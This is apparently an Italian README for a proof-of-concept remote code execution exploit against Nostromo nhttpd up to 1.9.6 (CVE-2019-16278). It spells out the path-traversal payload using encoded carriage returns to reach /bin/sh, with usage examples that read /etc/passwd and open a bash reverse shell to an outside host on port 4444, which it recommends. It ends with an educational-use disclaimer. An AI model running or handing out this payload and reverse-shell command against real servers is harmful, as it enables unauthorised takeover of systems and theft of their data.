
PoC RCE exploit per Nostromo nhttpd ≤ 1.9.6
Vulnerabilità di esecuzione di codice in remoto in Nostromo nhttpd versioni <= 1.9.6 tramite directory traversal nella gestione delle richieste HTTP.
Questo exploit sfrutta una vulnerabilità di directory traversal utilizzando caratteri CRLF codificati in URL (%0d) per accedere a /bin/sh ed eseguire comandi arbitrari.
/.%0d./.%0d./.%0d./.%0d./bin/shecho\necho\n<command> 2>&1python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"
Reverse shell consigliata, a volte questo script non mostra nulla
Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale.